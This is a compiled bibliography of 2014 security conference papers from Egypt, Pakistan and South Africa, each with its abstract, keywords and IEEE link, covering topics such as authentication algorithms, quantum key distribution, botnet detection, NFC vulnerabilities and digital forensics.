 keywords: {computer aided instruction; security of data; MFC;e-learning system; linear model; mean failure cost cyber-security model; secure e-learning environment; security threat propagation modeling; system architectural components; Analytical models; Electronic learning; Malware; Servers; Shape; Vectors; Countermeasures; Critical security threats; E-learning; The Mean Failure Cost; Threats propagation model (ID#: 14-3398)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913968&isnumber=6913961

 

Hassan, Z.Z.; Elgarf, T.A.; Zekry, A., "Modifying Authentication Techniques In Mobile Communication Systems," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.38,44, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913969 Milenage algorithm applies the block cipher Rijnadael (AES) with 128 bit key and 128 bit block size. This algorithm is used in the 3GPP authentication and key generation functions (f1, f1*, f2, f3, f4, f5 and f5*) for mobile communication systems (GSM/UMTS/LTE). In this paper a modification of Milenage algorithm is proposed through a dynamic change of S-box in AES depending on secret key. To get a new secret key for every authentication process we add the random number (RAND) transmitted from the authentication center (AUC) to the contents of the fixed stored secret key (Ki) and thus the initialization of the AES will be different each new authentication process. For every change in secret key a new S-box is derived from the standard one by permuting its rows and columns with the help of a new designed PN sequence generator. A complete simulation of modified Milenage and PN sequence generator is done using Microcontroller (PIC18F452). Security analysis is applied using Avalanche test to compare between the original and modified Milenage. Tests proved that the modified algorithm is more secure than the original one due to the dynamic behavior of S-box with every change of the secret key and immunity against linear and differential cryptanalysis using Avalanche tests. This makes the modified Milenage more suitable for the applications of authentication techniques specially for mobile communication systems.

 Keywords: 3G mobile communication; cryptography; microcontrollers; telecommunication security; 3GPP authentication function; AES;AUC;GSM system; Global System for Mobile Communication; LTE system; Long-Term Evolution; Milenage algorithm;PIC18F452 microcontroller; RAND; Rijnadael block cipher; UMTS system; Universal Mobile Telecommunication System; advanced encryption standard; authentication center; authentication techniques; avalanche test; key generation function; mobile communication system; random number; secret key; security analysis; Authentication; Ciphers; Generators; Heuristic algorithms; Long Term Evolution; Mobile communication; Vectors; AES; Authentication vector (AV); Dynamic S-BOX and PN Sequence Generator(LFSR); F1∗; F2; F3; F4; F5; F5∗); Modified MILENAGE Algorithm for AKA Functions (F1} (ID#: 14-3399)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913969&isnumber=6913961

 

Jasim Mohammad, O.K.; Abbas, S.; El-Horbaty, E.-S.M.; Salem, A.-B.M., "Statistical Analysis For Random Bits Generation On Quantum Key Distribution," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.45,51, April 29 2014-May 1 2014

doi: 10.1109/CyberSec.2014.6913970 Recently, Quantum cryptography researchers utilize the quantum keys, in order to provide a more trusted environment for both key distribution and management processes. The quantum keys are generated based on quantum mechanics phenomena. However, all events for the quantum key generation rely on exchanging photons between parties over limited distances. So, in this paper, random tests algorithms, such as NIST and DIEHARD, are implemented to test and evaluate the randomness rates for quantum keys generation. After then, the initialized vector, which is the seed of the symmetric encryption algorithms, is established based on specific analysis to be a key for the algorithms. The paper utilizes the (BB84) quantum key distribution (QKD) protocol based on two different innovated modes, the raw and privacy modes.

Keywords: cryptographic protocols; quantum cryptography; statistical analysis; DIEHARD algorithm; NIST algorithm; QKD protocol; key distribution process; key management process; privacy mode; quantum cryptography; quantum key distribution; quantum mechanics phenomenon; random bits generation; random tests algorithm; raw mode; statistical analysis; Algorithm design and analysis ;Encryption; NIST; Photonics; Privacy; Protocols; binary distribution; cryptographic analysis; pseudo random number; quantum key distribution; random number generator; statistical test (ID#: 14-3400)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913970&isnumber=6913961

 

Kebande, V.R.; Venter, H.S., "A Cognitive Approach For Botnet Detection Using Artificial Immune System In The Cloud," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.52,57, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913971 The advent of cloud computing has given a provision for both good and malicious opportunities. Virtualization itself as a component of Cloud computing, has provided users with an immediate way of accessing limitless resource infrastructures. Botnets have evolved to be the most dangerous group of remote-operated zombie computers given the open cloud environment. They happen to be the dark side of computing due to the ability to run illegal activities through remote installations, attacks and propagations through exploiting vulnerabilities. The problem that this paper addresses is that botnet technology is advancing each day and detection in the cloud is becoming hard. In this paper, therefore, the authors' presents an approach for detecting an infection of a robot network in the cloud environment. The authors proposed a detection mechanism using Artificial Immune System (AIS). The results show that this research is significant.

Keywords: artificial immune systems; cloud computing; invasive software; virtualisation; AIS; artificial immune system; botnet detection; cloud computing; cognitive approach; directed graph network; resource infrastructure access; virtualization; Cloud computing; Computers; Detectors; Immune system; Monitoring; Pattern matching; Artificial immune system; Botnet; Cloud; Detection; Negative selection (ID#: 14-3401)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913971&isnumber=6913961

 

El Zouka, H.A.; Hosni, M.M., "On the Power Of Quantum Cryptography And computers," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.58,63, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913972 It is well known that threats and attacks to information on the digital network environment are growing rapidly, putting extra pressure on individuals and businesses to protect their privacy and intellectual property. For this reason, many cryptographic security protocols have been developed over the past decades in an attempt to protect the privacy between communicating parties and to reduce the risk of malicious attacks. However, most of the cryptographic algorithms developed so far are based on mathematical models and suffer from many security defects, such as: a brute force attack, factorization problem, and many others. Thus, most of these proposed cryptographic systems are not proven to be completely secure against the main threats of modern networking technologies and computing systems. In this paper, a security framework model for quantum cryptography system which is based on the physical properties of light particles is proposed and all security requirements to assist in ensuring confidentiality between communicating parties are incorporated. The research work in this paper is based on a series of experiments which have been advocated recently by some agencies and researchers who used the quantum technology as a more effective method for solving the key distribution problem. The results of the proposed method is demonstrated and validated by experimental results.

Keywords: cryptographic protocols; data privacy; quantum cryptography; brute force attack; communicating parties; computers; computing systems; cryptographic algorithms; cryptographic security protocols; cryptographic systems; digital network environment; factorization problem; intellectual property; key distribution problem; malicious attacks; mathematical models; modern networking technologies; privacy; putting extra pressure; quantum cryptography system; quantum technology; security defects; security framework model; security requirements; Ciphers; Encryption; Optical fibers; Photonics; Public key; Cryptanalysis; Cryptography; Quantum Key Distribution; Quantum Technology; Security Protocols (ID#: 14-3402)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913972&isnumber=6913961

 

Kaddour, M.; Tmazirte, N.A.; El-Najjar, M.E.; Naja, Z.; Moubayed, N., "Autonomous Integrity Monitoring For GNSS Localization Using Informational Approach And Iono-Free Measurements," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp.64,69, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913973 The Receiver Autonomous Integrity Monitoring (RAIM) is used to improve positioning system safety. This paper proposes a new RAIM approach to detect and exclude multi-faults of GNSS measurements before position estimation. The new approach uses the information filter for position estimation and information test to faults diagnosis. This test is based on exponential convergence of the information filter measured using the mutual information. Results with real data of GNSS measurements (C/A code and L1 phase) show the benefits of the proposed approach in improving the GNSS receiver integrity positioning.

Keywords: Global Positioning System; estimation theory; fault diagnosis; radio receivers; radiotelemetry; C-A code; GNSS localization; GNSS measurement;L1 phase; RAIM approach; autonomous integrity monitoring; fault diagnosis; informational approach; ionofree measurement; multifault detection; mutual information; position estimation; positioning system safety; receiver autonomous integrity monitoring approach; Global Positioning System; Information filters; Mutual information; phase measurement; Pollution measurement; Receivers; Satellites; GNNS localization; Information Filter; Information theory; Mutual Information (ID#: 14-3403)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913973&isnumber=6913961


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Information Assurance and Cyber Security (CIACS) - Pakistan

Info Assurance and Computer Technology (CIACS) Pakistan


2014 Conference on Information Assurance and Cyber Security (CIACS) was held 12-13 June 2014 at Rawalpindi, Pakistan.  Sponsored by the Department of Information Security (IS Department) at Military College of Signals, NUST, Pakistan,  CIACS is a forum of academic and professional research, the conference includes 5 regular papers and 5 short papers that have been selected through double blind review process from a total of 65 high quality technical paper submissions, thereby having an acceptance rate of about 7.69% for regular papers and 15.38% for short papers. The papers collected in these proceedings cover topics like Authentication and Access Control, Botnets, Cryptography and Cryptanalysis, Data Security and Privacy, Digital Signatures, Information Hiding, Key Management, Secure Programming, Cloud Security, Computer Security, Database Security, Distributed Systems Security, Internet Security, Operating Systems Security, Physical Security, Social Networks Security, Web Services Security, Wireless Networks Security, Cyber Crime and Social Implications, Cyber Laws, Information Security Auditing and Management, Information Security Strategy, Security Standards and Best Practices, Cloud Forensics, Computer Emergency Response Team (CERT), Digital Forensics, Ethical Hacking, Future of Information Security, Incident Response, Malware Detection and Analysis, Penetration Testing and Vulnerability Assessment.

 

Zahid, A.; Masood, R.; Shibli, M.A., "Security of Sharded Nosql Databases: A Comparative Analysis," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.1, 8, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861323 NoSQL databases are easy to scale-out because of their flexible schema and support for BASE (Basically Available, Soft State and Eventually Consistent) properties. The process of scaling-out in most of these databases is supported by sharding which is considered as the key feature in providing faster reads and writes to the database. However, securing the data sharded over various servers is a challenging problem because of the data being distributedly processed and transmitted over the unsecured network. Though, extensive research has been performed on NoSQL sharding mechanisms but no specific criterion has been defined to analyze the security of sharded architecture. This paper proposes an assessment criterion comprising various security features for the analysis of sharded NoSQL databases. It presents a detailed view of the security features offered by NoSQL databases and analyzes them with respect to proposed assessment criteria. The presented analysis helps various organizations in the selection of appropriate and reliable database in accordance with their preferences and security requirements.

Keywords: SQL; security of data; BASE; NoSQL sharding mechanisms; assessment criterion ;security features; sharded NoSQL databases; Access control; Authentication; Distributed databases; Encryption; Servers; Comparative Analysis; Data and Applications Security; Database Security; NoSQL; Sharding  (ID#: 14-3382)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861323&isnumber=6861314

 

Sajjad, S.M.; Yousaf, M., "Security Analysis of IEEE 802.15.4 MAC in the Context of Internet of Things (IoT)," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.9,14, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861324 A paradigm in which household substances around us with embedded computational competences and capable of producing and distributing information is referred to as Internet of Things (IoT). IEEE 802.15.4 presents power efficient MAC layer for Internet of Things (IoT). For the preservation of privacy and security, Internet of Things (IoT) needs stern security mechanism so as to stop mischievous communication inside the IoT structure. For this purpose security weaknesses of the MAC protocol of IEEE 802.15.4 and their most important attacks have to be examined. Also security charter of IEEE 802.15.4 is to be analyzed in order to ascertain their limitations with regard to Internet of Things (IoT). Various ranges of attacks taking place in the Contention Free Period (CFP) in addition to Contention Access Period (CAP) of the super-frame structure needs to be explored and discussed. In view of the shortlisted weaknesses we would be arriving at the conclusion that the IEEE 802.15.4 security charter may be harmonized in accordance with the requirements of the Internet of Things. The missing functionalities may be incorporated in the upper layers of Internet of Things (IoT) Architecture.

Keywords: {Internet of Things; Zigbee; access protocols; computer network security; CAP; CFP; IEEE 802.15.4 MAC protocol; IEEE 802.15.4 security charter; Internet of Things; IoT; contention access period; contention free period; security mechanism; IEEE 802.15 Standards; Internet of Things; Payloads; Protocols; Radiation detectors; Security; Synchronization; IEEE 802.15.4;Internet of Things; IoT IETF Standardization; IoT Protocol Stack; Security (ID#: 14-3383)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861324&isnumber=6861314

 

Mahmood, A.; Akbar, A.H., "Threats in End To End Commercial Deployments Of Wireless Sensor Networks And Their Cross Layer Solution," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.15,22, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861325 Commercial Wireless Sensor Networks (WSNs) can be accessed through sensor web portals. However, associated security implications and threats to the 1) users/subscribers 2) investors and 3) third party operators regarding sensor web portals are not seen in completeness, rather the contemporary work handles them in parts. In this paper, we discuss different kind of security attacks and vulnerabilities at different layers to the users, investors including Wireless Sensor Network Service Providers (WSNSPs) and WSN itself in relation with the two well-known documents i.e., “Department of Homeland Security” (DHS) and “Department of Defense (DOD)”, as these are standard security documents till date. Further we propose a comprehensive cross layer security solution in the light of guidelines given in the aforementioned documents that is minimalist in implementation and achieves the purported security goals.

Keywords: {telecommunication security; wireless sensor networks; Department of Defense; Department of Homeland Security; WSNSP; cross layer security solution; cross layer solution; end to end commercial deployments; security attacks; security goals; sensor web portals; standard security documents; wireless sensor network service providers; Availability; Mobile communication; Portals; Security; Web servers; Wireless sensor networks; Wireless sensor network; attacks; commercial; security; sensor portal; threats; web services (ID#: 14-3384)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861325&isnumber=6861314

 

Waqas, A.; Yusof, Z.M.; Shah, A.; Khan, M.A., "ReSA: Architecture for Resources Sharing Between Clouds," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.23, 28, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861326 Cloud computing has emerged as paradigm for hosting and delivering services over the Internet. It is evolved as a key computing platform for delivering on-demand resources that include infrastructures, software, applications, and business processes. Mostly, clouds are deployed in a way that they are often isolated from each other. These implementations cause lacking of resources collaboration between different clouds. For example, cloud consumer requests some resource and that is not available at that point in time. Client satisfaction is important for business as denying the client may be expensive in many ways. To fulfill the client request, the cloud may ask the requested resource from some other cloud. In this research paper we aim to propose a trust worthy architecture named ReSA (Resource Sharing Architecture) for sharing on-demand resources between different clouds that may be managed under same or different rules, policies and management.

Keywords: cloud computing; resource allocation; security of data; software architecture; Internet; ReSA; Resource Sharing Architecture; client request; client satisfaction; cloud computing; resources collaboration; service delivery; service hosting; trust worthy architecture; Cloud computing; Computational modeling; Computer architecture; Resource management; Software as a service; Standards organizations; cloud architecture; cloud computing; federated clouds; resource collaboration; resource management (ID#: 14-3385)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861326&isnumber=6861314

 

Arshad, A.; Kundi, D.-e.-S.; Aziz, A., "Compact Implementation of SHA3-512 on FPGA," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp. 29, 33, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861327 In this work we present a compact design of newly selected Secure Hash Algorithm (SHA-3) on Xilinx Field Programable Gate Array (FPGA) device Virtex-5. The design is logically optimized for area efficiency by merging Rho, Pi and Chi steps of algorithm into single step. By logically merging these three steps we save 16 % logical resources for overall implementation. It in turn reduced latency and enhanced maximum operating frequency of design. It utilizes only 240 Slices and has frequency of 301.02 MHz. Comparing the results of our design with the previously reported FPGA implementations of SHA3-512, our design shows the best throughput per slice (TPS) ratio of 30.1.

Keywords: cryptography; field programmable gate arrays; logic design; Chi step; FPGA; Pi step; Rho step;SHA3-512;TPS;Virtex-5;Xilinx field programable gate array device; area efficiency; compact implementation; cryptographic hash function; latency reduction; maximum operating frequency enhancement; secure hash algorithm; throughput-per-slice ratio; Algorithm design and analysis; Arrays; Clocks; Field programmable gate arrays; Hardware; Signal processing algorithms;Throughput;Cryptography;FPGA;SHA3;Security; Xilinx (ID#: 14-3386)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861327&isnumber=6861314

 

Chattha, N.A., "NFC — Vulnerabilities and Defense," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.35,38, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861328 Near Field Communication (NFC) has been in use for quite some time by many users in mobile devices. Its use is increasing by the rapid increase in the availability of the NFC enabled devices in the market. It enables data transfer by bringing the two devices in close proximity, about 3-5 inches. It is designed for integration with mobile phones, which can communicate with other phones (peer-to-peer) or read information on tags and cards (reader). An NFC device can also be put in card emulation mode, to offer compatibility with other contactless smart card standards. This enables NFC enabled smart-phones to replace traditional contactless plastic cards used in public transport ticketing, access control, ATMs and other similar applications. NFC is a new and innovative technology with futuristic uses, but technology comes at a price both in terms of financial effects as well as the maintenance costs. The most pertinent concern would be that how much vulnerable the new technology is. There had already been instances where the security of NFC has been put to questions. It is vulnerable to numerous kinds of attacks. This research paper will list down the basic working principles of NFC, the protocols involved, vulnerabilities reported so far and possible countermeasures against the weaknesses.

Keywords: near-field communication; protocols; radiofrequency identification; smart cards; smart phones; telecommunication security; NFC enabled devices; NFC enabled smart-phones; NFC security; card emulation mode; contactless smart card standards; data transfer; mobile devices; mobile phones; near field communication; protocols; radio frequency identification; Emulation; Mobile handsets; Peer-to-peer computing; Protocols; Radio frequency; Radiofrequency identification; Security; NFC; NFC security; Near Field Communication; RFID; Radio Frequency Identification (ID#: 14-3387)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861328&isnumber=6861314

 

Javid, T.; Riaz, T.; Rasheed, A., "A Layer2 Firewall For Software Defined Network," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.39,42, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861329 The software defined networking is an emerging three layer architecture which defines data, control, and application planes. Data and control planes implement forwarding and routing functions, respectively. Application plane contains communicating processes. This paper presents a layer2 fire-wall implementation using an example tree topology with one controller, three switches, and four hosts. Our implementation uses POX controller at control plane of the architecture. The modified code successfully controlled flow of packets between hosts according to firewall rules.

Keywords: firewalls; POX controller; example tree topology; forwarding function; layer2 firewall implementation; routing function; software defined networking; three layer architecture; Computer architecture; Control systems ;Firewalls (computing); Flowcharts; Network topology; Ports (Computers);Topology; Firewall; Mininet; OpenFlow; POX; SDN (ID#: 14-3388)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861329&isnumber=6861314

 

Durrani, A., "Analysis and Prevention Of Vulnerabilities In Cloud Applications," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.43, 46, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861330 Cloud computing has emerged as the single most talked about technology of recent times. Its aim, to provide agile information technology solutions and infrastructure is the primary reason for its popularity. It enables the organizations to ensure that their resources are utilized efficiently, development process is enhanced and investments or costs incurred to buy technological resources are reduced. At the same time Cloud computing is being scrutinized in the security world due to the various vulnerabilities and threats that it poses to the user data or resources. This paper highlights the vulnerabilities that exist in applications available on the cloud and aims to make an analysis of different types of security holes found in these applications by using open source vulnerability assessment tools. It identifies the security requirements pertinent to these applications and makes an assessment whether these requirements were met by them by testing two of these applications using the vulnerability tools. It also provides remedial measures for the security holes found in these applications and enables the user to select a secure provider for themselves while at the same time enabling the cloud provider to improve their services and find a competitive edge in the market.

Keywords: cloud computing; security of data; agile information technology solutions; cloud applications; cloud computing; development process enhancement; open source vulnerability assessment tools; resource utilization; security holes; security requirements; vulnerability analysis; vulnerability prevention; Cloud computing; Electronic mail; Encryption; Linux; Organizations; Servers; Kali Linux; Vega; Vmware; cloud computing; degaussing; deployment models; multi client environment (ID#: 14-3389)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861330&isnumber=6861314

 

Butt, M.I.A., "BIOS Integrity and Advanced Persistent Threat," Information Assurance and Cyber Security (CIACS), 2014 Conference on, pp.47,50, 12-13 June 2014. doi: 10.1109/CIACS.2014.6861331 Basic Input Output System (BIOS) is the most important component of a computer system by virtue of its role i.e., it holds the code which is executed at the time of startup. It is considered as the trusted computing base, and its integrity is extremely important for smooth functioning of the system. On the contrary, BIOS of new computer systems (servers, laptops, desktops, network devices, and other embedded systems) can be easily upgraded using a flash or capsule mechanism which can add new vulnerabilities either through malicious code, or by accidental incidents, and deliberate attack. The recent attack on Iranian Nuclear Power Plant (Stuxnet) [1:2] is an example of advanced persistent attack. This attack vector adds a new dimension into the information security (IS) spectrum, which needs to be guarded by implementing a holistic approach employed at enterprise level. Malicious BIOS upgrades can also cause denial of service, stealing of information or addition of new backdoors which can be exploited by attackers for causing business loss, passive eaves dropping or total destruction of system without knowledge of user. To address this challenge a capability for verification of BIOS integrity needs to be developed and due diligence must be observed for proactive resolution of the issue. This paper explains the BIOS Integrity threats and presents a prevention strategy for effective and proactive resolution.

Keywords: {computer network security; data integrity; firmware; trusted computing; BIOS integrity; Iranian Nuclear Power Plant; Stuxnet; advanced persistent threat; basic input output system; information security spectrum; roots of trust; Biological system modeling; Hardware; Organizations; Security; Servers; Vectors; Advanced Persistent Threat (APT); BIOS Integrity Measurement; Original Equipment Manufacturer (OEM);Roots of Trust (RoTs);Trusted Computing (ID#: 14-3390)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861331&isnumber=6861314

 

Ullah, R.; Nizamuddin; Umar, A.I.; ul Amin, N., "Blind signcryption scheme based on elliptic curves," Information Assurance and Cyber Security (CIACS), 2014 Conference on , vol., no., pp.51,54, 12-13 June 2014

doi: 10.1109/CIACS.2014.6861332

Abstract: In this paper blind signcryption using elliptic curves cryptosystem is presented. It satisfies the functionalities of Confidentiality, Message Integrity, Unforgeability, Signer Non-repudiation, Message Unlink-ability, Sender anonymity and Forward Secrecy. The proposed scheme has low computation and communication overhead as compared to existing blind Signcryption schemes and best suited for mobile phone voting and m-commerce.

 keywords: {public key cryptography; blind signcryption scheme; communication overhead; confidentiality; elliptic curves cryptosystem; forward secrecy; m-commerce; message integrity; message unlink-ability; mobile phone voting; sender anonymity; signer nonrepudiation; unforgeability; Digital signatures; Elliptic curve cryptography; Elliptic curves; Equations; Mobile handsets; Anonymity; Blind Signature; Blind Signcryption; Elliptic curves; Signcryption}, (ID#: 14-3391)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861332&isnumber=6861314


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Information Security for South Africa

Information Security for South Africa


The conference on Information Security for South Africa (ISSA), 2014, was held 13-14 August 2014 at Johannesburg, South Africa.  The 2014 conference was held under the auspices of the University of Johannesburg Academy for Computer Science and Software Engineering, the University of South Africa School of Computing and the University of Pretoria Department of Computer Science.  The works cited here are more technical and general in nature and do not include many excellent papers focused on the unique issues of South Africa.

 

Valjarevic, Aleksandar; Venter, Hein S.; Ingles, Melissa, "Towards a Prototype For Guidance And Implementation Of A Standardized Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014, pp.1,8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950488 Performing a digital forensic investigation requires a standardized and formalized process to be followed. There currently is neither an international standard formalizing such process nor does a global, harmonized digital forensic investigation process exist. Further, there exists no application that would guide a digital forensic investigator to efficiently implement such a process. This paper proposes the implementation of such a prototype in order to cater for this need. A comprehensive and harmonized digital forensic investigation process model has been proposed by the authors in their previous work and this model is used as a basis of the prototype. The prototype is in the form of a software application which would have two main functionalities. The first functionality would be to act as an expert system that can be used for guidance and training of novice investigators. The second functionality would be to enable reliable logging of all actions taken within the processes proposed in a comprehensive and harmonized digital forensic investigation process model. Ultimately, the latter functionality would enable the validation of use of a proper process. The benefits of such prototype include possible improvement in efficiency and effectiveness of an investigation due to the fact that clear guidelines will be provided when following the process for the course of the investigation. Another benefit includes easier training of novice investigators. The last, and possibly most important benefit, includes that higher admissibility of digital evidence as well as results and conclusions of digital forensic investigations will be possible due to the fact that it will be easier to show that the correct standardized process was followed.

Keywords: Analytical models; Cryptography; Irrigation; ISO/IEC 27043; digital forensic investigation process model; digital forensics; harmonization; implementation prototype  standardization (ID#: 14-3404)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950488&isnumber=6950479

 

Trenwith, Philip M.; Venter, Hein S., "A Digital Forensic Model For Providing Better Data Provenance In The Cloud," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950489 The cloud has made digital forensic investigations exceedingly difficult due to the fact that data may be spread over an ever-changing set of hosts and data centres. The normal search and seizure approach that digital forensic investigators tend to follow does not scale well in the cloud because it is difficult to identify the physical devices that data resides on. In addition, the location of these devices is often unknown or unreachable. A solution to identifying the physical device can be found in data provenance. Similar to the tags included in an email header, indicating where the email originated, a tag added to data, as it is passed on by nodes in the cloud, identifies where the data came from. If such a trace can be provided for data in the cloud it may ease the investigating process by indicating where the data can be found. In this research the authors propose a model that aims to identify the physical location of data, both where it originated and where it has been as it passes through the cloud. This is done through the use of data provenance. The data provenance records will provide digital investigators with a clear record of where the data has been and where it can be found in the cloud.

Keywords: Cloud computing; Computational modeling; Computers; Digital forensics; Open systems; Protocols; Servers; Cloud Computing; Digital Forensic Investigation; Digital Forensics; annotations; bilinear pairing technique; chain of custody; data provenance (ID#: 14-3405)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950489&isnumber=6950479

 

Mpofu, Nkosinathi; van Staden, Wynand JC, "A Survey Of Trust Issues Constraining The Growth Of Identity Management-as-a-Service(IdMaaS)," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950490 Identity management-as-a-service (IdMaaS) is a cloud computing service where the identity management function is moved to the cloud, streamlining the responsibilities of the computing or IT departments of organisations. IdMaaS's attractiveness leans on reduced cost of ownership, least to no capital investment, scalability, self-service, location independence and rapid deployment, however, its growth has been impeded by issues most of which are related to security, privacy and trust. Most organisations view identities as passports to key computing resources (hardware, software and data) as such they view identity management as a core IT function which must remain within the perimeter of sphere of control. This paper primarily aims to discuss IdMaaS and highlight the major trust issues in current existing cloud computing environments affecting the growth of IdMaaS by describing IdMaaS and surveying the trust issues that pose threats to its growth. Highlighting the trust issues hampering the growth of IdMaaS will lay a foundation for subsequent research efforts directed at addressing trust issues and therefore enhancing the growth of IdMaaS. Consequently the growth of IdMaaS will open up a new entrepreneurial avenue for service providers, at the same time enabling IdMaaS consumers to realise the benefits which come along with cloud computing. In future, we will analyse and evaluate the extent of impact posed by each trust issue to IdMaaS.

Keywords: Authentication; Authorization; Availability; Cloud computing; identity management; identity management-as- as-service; trust (ID#: 14-3406)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950490&isnumber=6950479

 

Mumba, Emilio Raymond; Venter, H.S., "Mobile Forensics Using The Harmonised Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014pp. 1, 10, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950491 Mobile technology is among the fastest developing technologies that have changed the way we live our daily lives. Over the past few years, mobile devices have become the most popular form of communication around the world. However, bundled together with the good and advanced capabilities of the mobile technology, mobile devices can also be used to perform various activities that may be of malicious intent or criminal in nature. This makes mobile devices a valuable source of digital evidence. For this reason, the technological evolution of mobile devices has raised the need to develop standardised investigation process models and procedures within the field of digital forensics. This need further supports the fact that forensic examiners and investigators face challenges when performing data acquisition in a forensically sound manner from mobile devices. This paper, therefore, aims at testing the harmonised digital forensic investigation process through a case study of a mobile forensic investigation. More specifically, an experiment was conducted that aims at testing the performance of the harmonised digital forensic investigation process (HDFIP) as stipulated in the ISO/IEC 27043 draft international standard through the extraction of potential digital evidence from mobile devices.

Keywords: ISO standards; Performance evaluation; Harmonised Digital Forensic Investigation Process (HDFIP); ISO/IEC 27043;mobile device; mobile forensics (ID#: 14-3407)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950491&isnumber=6950479

 

Schnarz, Pierre; Fischer, Clemens; Wietzke, Joachim; Stengel, Ingo, "On a Domain Block Based Mechanism To Mitigate Dos Attacks On Shared Caches In Asymmetric Multiprocessing Multi Operating Systems," Information Security for South Africa (ISSA), 2014, pp.1, 8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950494 Asymmetric multiprocessing (AMP) based multi-OSs are going to be established in future to enable parallel execution of different functionalities while fulfilling requirements for real-time, reliability, trustworthiness and security. Especially for in-car multimedia systems, also known as In-Vehicle Infotainment (IVI) systems, the composition of different OS-types onto a system-on-chip (SoC) offers a wide variety of advantages in embedded system development. However, the asymmetric paradigm, which implies the division and assignment of every hardware resource to OS-domains, is not applicable to every part of a system-on-chip (SoC). Caches are often shared between multiple processors on multi processor SoCs (MP-SoC). According to their association to the main memory, OSs running on the processor cores are naturally vulnerable to DoS attacks. An adversary who has compromised one of the OS-domains is able to attack an arbitrary memory location of a co-OS-domain. This introduces performance degradations on victim's memory accesses. In this work a method is proposed which prohibits the surface for interference, introduced by the association of cache and main memory. Therefore, the contribution of this article is twofold. It introduces an attack vector, by deriving an algorithm from the cache way associativity, to affect the co-OSs running on the same platform. Using this vector it is shown that the mapping of contiguous memory blocks intensifies the effect. Subsequently, a memory mapping method is proposed which mitigates the interference effects of cache coherence. The approach is evaluated by a proof-of-concept implementation, which illustrates the performance impact of the attack and the countermeasure, respectively. The method enables a more reliable implementation of AMP-based multi-OSs on MP-SoCs using shared caches without the need to modify the hardware layout.

Keywords: Computer architecture; Computer crime; Hardware; Interference; Program processors; System-on-chip; Vectors (ID#: 14-3408)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950494&isnumber=6950479

 

